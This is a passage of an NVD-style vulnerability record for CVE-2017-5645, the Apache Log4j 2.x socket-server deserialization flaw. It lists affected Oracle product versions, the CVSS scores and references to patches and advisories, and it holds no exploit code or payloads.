"cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.4:*:*:*:*:*:*:*", matchCriteriaId: "9F94F4C7-8E3E-4D0E-A5E7-E8D4E2D21D6D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.5:*:*:*:*:*:*:*", matchCriteriaId: "CBCF09A6-8A57-40F4-9EB3-48F4806B4803", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.6:*:*:*:*:*:*:*", matchCriteriaId: "CBBE93A9-5628-4176-866E-88DE10B9778D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.7:*:*:*:*:*:*:*", matchCriteriaId: "FDB71361-D75B-4937-A48E-C2C0064E09FB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.8:*:*:*:*:*:*:*", matchCriteriaId: "FEB68145-0577-472D-B310-A7BF065ADA9E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.9:*:*:*:*:*:*:*", matchCriteriaId: "56961578-6FCB-489C-8431-22F9D263DFFA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.10:*:*:*:*:*:*:*", matchCriteriaId: "93EA52BF-E710-4309-9272-8F81D5751ABA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "06CF27F6-ADC1-480C-9D2E-2BD1E7330C32", versionEndIncluding: "16.2.11", versionStartIncluding: "16.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "E4AA3854-C9FD-4287-85A0-EE7907D1E1ED", versionEndIncluding: "17.12.7", versionStartIncluding: "17.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*", matchCriteriaId: "19A0F1AF-F2E6-44E7-8E2D-190E103B72D3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*", matchCriteriaId: "6D53690D-3390-4A27-988A-709CD89DD05B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_advanced_inventory_planning:14.0:*:*:*:*:*:*:*", matchCriteriaId: 
"A25285DC-9E51-44F8-818A-86A79B3565DA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_advanced_inventory_planning:15.0:*:*:*:*:*:*:*", matchCriteriaId: "517E0654-F1DE-43C4-90B5-FB90CA31734B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0.5:*:*:*:*:*:*:*", matchCriteriaId: "FE91D517-D85D-4A8D-90DC-4561BBF8670E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.0:*:*:*:*:*:*:*", matchCriteriaId: "202DE5CB-B3D4-4289-9AA2-24E9CE266EE3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.1:*:*:*:*:*:*:*", matchCriteriaId: "2F7D07CB-15D2-424D-8E25-7AC59ACFFD05", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2:*:*:*:*:*:*:*", matchCriteriaId: "AE02A69E-F820-4261-8D7E-9B1021E5A9AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_extract_transform_and_load:19.0:*:*:*:*:*:*:*", matchCriteriaId: "4E306B67-E1BD-4A67-A77D-A7DC72D5B957", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:14.0.0:*:*:*:*:*:*:*", matchCriteriaId: "CB5F56EC-8415-4BA1-9D8A-C77F4BB1AF62", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:14.1.0:*:*:*:*:*:*:*", matchCriteriaId: "965BCB93-2DED-41FD-972E-FF5958691A35", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", matchCriteriaId: "42064F46-3012-4FB1-89BA-F13C2E4CBB6B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", matchCriteriaId: "F73E2EFA-0F43-4D92-8C7D-9E66811B76D6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_open_commerce_platform:5.3.0:*:*:*:*:*:*:*", matchCriteriaId: "07630491-0624-4C5C-A858-C5D3CDCD1B68", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EC9CA11F-F718-43E5-ADB9-6C348C75E37A", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.1:*:*:*:*:*:*:*", matchCriteriaId: "9FBAAD32-1E9D-47F1-9F47-76FEA47EF54F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3:*:*:*:*:*:*:*", matchCriteriaId: "24A3C819-5151-4543-A5C6-998C9387C8A2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", matchCriteriaId: "378A6656-252B-4929-83EA-BC107FDFD357", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", matchCriteriaId: "363395FA-C296-4B2B-9D6F-BCB8DBE6FACE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", matchCriteriaId: "F62A2144-5EF8-4319-B8C2-D7975F51E5FA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.7:*:*:*:*:*:*:*", matchCriteriaId: "EBAE649F-0389-4875-A995-E73E287AB342", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.8:*:*:*:*:*:*:*", matchCriteriaId: "9D5EC241-7D11-47F4-8B41-D362651A5E8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.9:*:*:*:*:*:*:*", matchCriteriaId: "8FCB6791-EBFA-4620-ABD4-D55CDCF3EA9D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:soa_suite:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "AF4C318C-5D1E-479B-9597-9FAD9E186111", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:soa_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "65994DC4-C9C0-48B0-88AB-E2958B4EB9E3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:soa_suite:12.2.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "4580A7AB-54A9-4784-9087-A3F107258593", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tape_library_acsls:8.4:*:*:*:*:*:*:*", matchCriteriaId: "70D4467D-6968-4557-AF61-AFD42B2B48D3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:timesten_in-memory_database:11.2.2.8.49:*:*:*:*:*:*:*", matchCriteriaId: "F9EB3DE5-142C-43A5-9735-CB73C54D42E4", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1:*:*:*:*:*:*:*", matchCriteriaId: "6FD0EC40-B96B-4E9C-9A81-4E65C4B9512E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_work_and_asset_management:1.9.1.2.12:*:*:*:*:*:*:*", matchCriteriaId: "BB1011D4-E5EE-4722-B644-D522EFC6337A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40B13B7-68B3-4510-968C-6A730EB46462", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "C93CC705-1F8C-4870-99E6-14BF264C3811", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", }, { lang: "es", value: "En Apache Log4j 2.x en versiones anteriores a 2.8.2, cuando se utiliza el servidor de socket TCP o el servidor de socket UDP para recibir sucesos de registro serializados de otra aplicación, puede enviarse una carga binaria especialmente diseñada que, cuando se deserializa, puede ejecutar código arbitrario.", }, ], id: "CVE-2017-5645", lastModified: "2025-04-20T01:37:25.860", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: 
"NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2017-04-17T21:59:00.373", references: [ { source: "security@apache.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { source: "security@apache.org", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { source: "security@apache.org", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "security@apache.org", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/97702", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040200", }, { source: "security@apache.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: 
"http://www.securitytracker.com/id/1041294", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2637", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2808", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { source: "security@apache.org", tags: [ 
"Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { source: "security@apache.org", tags: [ "Issue Tracking", "Vendor Advisory", ], url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3Cdev.logging.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3Cannounce.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { source: "security@apache.org", url: 
"https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3Cdev.logging.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3Cdev.logging.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3Cissues.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: 
"https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3Ccommits.logging.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: 
"https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3Ccommits.doris.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3Cgithub.beam.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3Cissues.activemq.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "security@apache.org", url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f%40%3Cdev.tika.apache.org%3E", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { source: "security@apache.org", tags: [ "Third Party Advisory", 
], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "security@apache.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "security@apache.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { 
source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/97702", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1040200", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securitytracker.com/id/1041294", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { source: 
"af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2637", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2808", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Vendor Advisory", ], url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3Cdev.logging.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3Cdev.tika.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3Cannounce.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3Cissues.activemq.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc%40%3Cdev.logging.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3Cdev.logging.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3Cissues.beam.apache.org%3E", }, { source: 
